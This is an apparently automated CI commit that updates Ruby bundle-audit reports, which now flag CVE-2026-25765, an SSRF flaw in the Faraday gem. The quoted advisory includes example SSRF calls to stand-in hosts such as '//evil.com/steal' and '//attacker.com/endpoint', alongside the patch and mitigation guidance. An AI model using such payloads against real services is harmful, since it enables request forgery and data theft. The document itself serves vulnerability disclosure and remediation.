commit by to_remotes 2026-02-12 08:49:23 +0100 from cicd

bundle-audit-time.txt

@@ -1 +1 @@
-2026-02-11T14:00:03+01:00
+2026-02-12T08:49:23+01:00

bundle-audit.json

@@ -1 +1 @@
-{"version":"0.9.3","created_at":"2026-02-11 14:00:02 +0100","results":[]}
+{"version":"0.9.3","created_at":"2026-02-12 08:49:23 +0100","results":[{"type":"unpatched_gem","gem":{"name":"faraday","version":"2.14.0"},"advisory":{"path":"/home/wiseadvice/.local/share/ruby-advisory-db/gems/faraday/CVE-2026-25765.yml","id":"CVE-2026-25765","url":"https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2","title":"Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url","date":"2026-02-09","description":"### Impact\n\nFaraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)\nuses Ruby's `URI#merge` to combine the connection's base URL with\na user-supplied path. Per RFC 3986, protocol-relative URLs\n(e.g. `//evil.com/path`) are treated as network-path references\nthat override the base URL's host/authority component.\n\nThis means that if any application passes user-controlled input to\nFaraday's `get()`, `post()`, `build_url()`, or other request\nmethods, an attacker can supply a protocol-relative URL like\n`//attacker.com/endpoint` to redirect the request to an\narbitrary host, enabling Server-Side Request Forgery (SSRF).\n\nThe `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts\nURLs starting with `/`, so protocol-relative URLs bypass it entirely.\n\n**Example**\n```ruby\nconn = Faraday.new(url: 'https://api.internal.com')\nconn.get('//evil.com/steal')\n# Request is sent to https://evil.com/steal instead of api.internal.com\n```\n\n### Patches\n\nFaraday v2.14.1 is patched against this security issue. All\nversions of Faraday up to 2.14.0 are affected.\n\n### Workarounds\n\n**NOTE: Upgrading to Faraday v2.14.1+ is the recommended action\nto mitigate this issue, however should that not be an option\nplease continue reading.**\n\nApplications should validate and sanitize any user-controlled\ninput before passing it to Faraday request methods.\nSpecifically:\n\n- Reject or strip input that starts with // followed by a\n  non-/ character.\n- Use an allowlist of permitted path prefixes.\n- Alternatively, prepend ./ to all user-supplied paths before\n  passing them to Faraday.\n\nExample validation:\n```ruby\ndef safe_path(user_input)\n  raise ArgumentError, \"Invalid path\" if user_input.match?(r{\\A//[^/]})\n   user_input\nend\n```\n","cvss_v2":null,"cvss_v3":5.8,"cve":"2026-25765","osvdb":null,"ghsa":"33mh-2634-fwr2","unaffected_versions":[],"patched_versions":[">= 2.14.1"],"criticality":"medium"}}]}

report.txt

@@ -1 +1,10 @@
-No vulnerabilities found
+Name: faraday
+Version: 2.14.0
+CVE: CVE-2026-25765
+GHSA: GHSA-33mh-2634-fwr2
+Criticality: Medium
+URL: https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2
+Title: Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url
+Solution: update to '>= 2.14.1'
+
+Vulnerabilities found!

update-info.txt

@@ -1,7 +1,13 @@
 Updating ruby-advisory-db ...
-Already up to date.
+Updating 1886fa5..826ac19
+Fast-forward
+ gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml | 45 ++++++++++++++++++++
+ gems/faraday/CVE-2026-25765.yml        | 75 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 120 insertions(+)
+ create mode 100644 gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml
+ create mode 100644 gems/faraday/CVE-2026-25765.yml
 Updated ruby-advisory-db
 ruby-advisory-db:
-  advisories:	1056 advisories
+  advisories:	1058 advisories
-  last updated:	2026-02-07 16:42:05 -0800
+  last updated:	2026-02-11 11:24:37 -0800
-  commit:	1886fa514d2ebe25d6146a1f1c786ac533d51d57
+  commit:	826ac198fe00af14343d839de644e74bf7d94d84